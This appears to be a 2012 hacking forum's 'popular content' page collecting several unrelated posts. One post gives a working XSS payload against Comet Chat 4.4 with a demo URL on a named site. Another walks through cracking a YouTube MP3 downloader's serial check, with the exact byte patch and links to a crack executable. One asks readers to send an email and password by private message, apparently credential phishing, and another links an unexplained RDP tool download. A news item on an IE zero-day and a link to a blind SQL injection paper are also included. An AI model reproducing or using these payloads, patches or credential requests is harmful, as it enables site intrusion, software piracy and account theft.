Leaderboard

Popular Content

Showing content with the highest reputation on 12/30/12 in Posts

  1. #############################
     ## Discovered by: 001
     #############################
     ## 05.12.2012
     #############################
     ## Application: Comet Chat 4.4
     #############################
     ## hackyard.net and trojanforge.com
     #############################
     cometchat/plugins/games/index.php?action=request&toId=1&gameId=');"><script>alert('Hackyard.net')</script>Sudoku<!--&gameWidth=1337
     It may also work in Comet Chat 4.6 or other versions, but I didn't test it. You need to make one new account on the targeted website. Then you can use this XSS like this (toId = target id):
     Demo: http://www.opensc.ws/chat/plugins/games/index.php?action=request&toId=1&gameId=');"><script>alert('Hackyard.net')</script>Sudoku<!--&gameWidth=1337
    1 point
  2. Author: Nytro © Romanian Security Team 2012
     I usually listen to music on YouTube, but today I got the urge to download the songs I had in my playlist. So I try a few sites, see that they work badly, then I search for and download a program that I find here: YouTube MP3 Downloader - Descarca - RO - Download.CHIP.eu. It looks OK, tidy, but then I find that it only downloads/converts half of the song. Since I had nothing else to do, I decided to try to make a crack for it. The first step, and the one that took me the longest, was to find where the serial check is done. It could be done simply by searching for the error message:
     007D8B51 . C785 3CFFFFFF >MOV DWORD PTR SS:[EBP-C4],Download.00638>; UNICODE "Invaild Regstration Code."
     After some struggle I eventually found where the serial check is done: I simply put a jmp in place of a jnz that wasn't being taken. It wasn't actually the serial check, just an earlier check.
     .text:007D8AF7 test eax, eax
     But then the check is done, and likewise a jump is made to the piece of code that tells us the serial is incorrect. A simple change from jnz to jz is enough. The procedure
     .text:007D9323 loc_7D9323:
     being called from
     .text:007D8FAB jnz loc_7D9323
     I had some problems with several exceptions, but I got past them. I don't recommend IDA because it can't patch the executable directly. First of all you have to change something in the config to have the "Patch" menu available, then you create a "diff" with which the program is patched.
     More details here: Marco Ramilli's Blog: How to Patch Binary with IDA Pro
     The patch is trivial:
     This difference file is created by The Interactive Disassembler
     Downloader.exe
     003D8AF9: 0F E9
     003D8AFA: 84 66
     003D8AFB: 65 01
     003D8AFC: 01 00
     003D8FAC: 85 84
     And in testing, the cracked program seems to accept any serial: I reinstalled the program, it did the same things, I put the crack in its place and it seems to work, to accept any serial: Well, I don't know if we can call it a "crack", but that's about it. And finally it downloads the whole song for me too: "CIA - Suntem tot aici.mp3"
     Download crack: https://rstforums.com/proiecte/Crack.exe
     Mirrors: http://www.speedyshare.com/2M4sa/Crack.exe http://www18.zippyshare.com/v/38589448/file.html
     PS: You can compare it with the original; use "Compare It" or anything else to check the differences, only about 5 bytes differ.
     Setup: http://download.chip.eu/ro/YouTube-MP3-Downloader_6745448.html
     Thanks, // Nytro
    1 point
  3. While analysing a compromised web page, security experts from FireEye discovered malware that exploits a previously unknown security hole in Internet Explorer. The hole allows attackers to inject malicious code into the Internet Explorer user's system when a specially crafted web page is visited. All versions up to and including IE version 8 are vulnerable; currently available information suggests that later versions are not affected.
     The researchers from FireEye report that the attackers first used a Flash applet to deploy shell code in RAM by means of heap spraying, and that they then managed to execute the code via the zero-day hole in IE. The hole involves a use-after-free issue with CDwnBindInfo within IE. The security hole the researchers found was exploited to inject a DLL into the system, but they have yet to comment on the library's purpose.
     The report states that the incident involves a "watering hole" attack: during such targeted cyber attacks, the attackers compromise web pages that are visited by their intended victims and deploy malicious code this way. The experts found the exploit on the web page of the Council on Foreign Relations, a US think tank that includes around 4,500 influential political and business personalities. The attackers used a few lines of JavaScript code to ensure that the exploit is only executed if the visitor's system language is set to US English, Chinese, Japanese, Korean or Russian.
     Talking to security blogger Brian Krebs, Microsoft confirmed the vulnerability and said that only versions 6 to 8 of Internet Explorer are affected. Since that confirmation, a Metasploit module has been published and US-CERT has released a vulnerability note on the issue. With details of the problem in circulation, it is very likely that attackers will have added or be adding the exploit to their arsenal of malware; users should look at moving to IE9 or later where they can.
     Update: Microsoft has also published its own official advisory and instructions on how to mitigate attacks and detect failing attacks on IE9 and IE10.
     Source: Critical zero-day hole in Internet Explorer - Update - The H Security: News and Features
    1 point
  4. Index:
     Why blind SQL injection?
     How blind SQL injection can be used
     Testing the vulnerability (MySQL - MSSQL):
     Time attack (MySQL)
     Time attack (MSSQL)
     Regexp attack methodology
     Finding table name with Regexp attack (MySQL)
     Finding table name with Regexp attack (MSSQL)
     Exporting a value with Regexp attack (MySQL)
     Exporting a value with Regexp attack (MSSQL)
     Time considerations
     Bypassing filters
     Real life example
     Conclusions
     http://www.ihteam.net/papers/blind-sqli-regexp-attack.pdf
     You can download an example of PHP code from http://www.ihteam.net/papers/regexp_bsqli.php.tar.gz
    1 point
  5. Target: Webmin. Post only censored screenshots. Solvers: 1. B7ackAnge7z [pm] 2. Toshib4 [pm] 3. nAb.h4x [pm] 4. ThePi [pm] 5. abraxyss [pm] // on this challenge everyone was too lazy to post and sent me a PM instead
    1 point
  6. Since it's the holidays now and 2012 is coming to an end, I want to offer you 50 GB free on box.net! Yes, free. Nothing illegal, I have an offer from box.net and that's all! Unlimited (I hope)! PM me with an email and password (it doesn't have to be your email password, just the one for the box.net account you want) and for the rest of the details! PS. Box.net = Dropbox, SkyDrive, Google Drive
    -1 points
  7. Link: Download RDP32.zip from Sendspace.com - send big files the easy way
    -1 points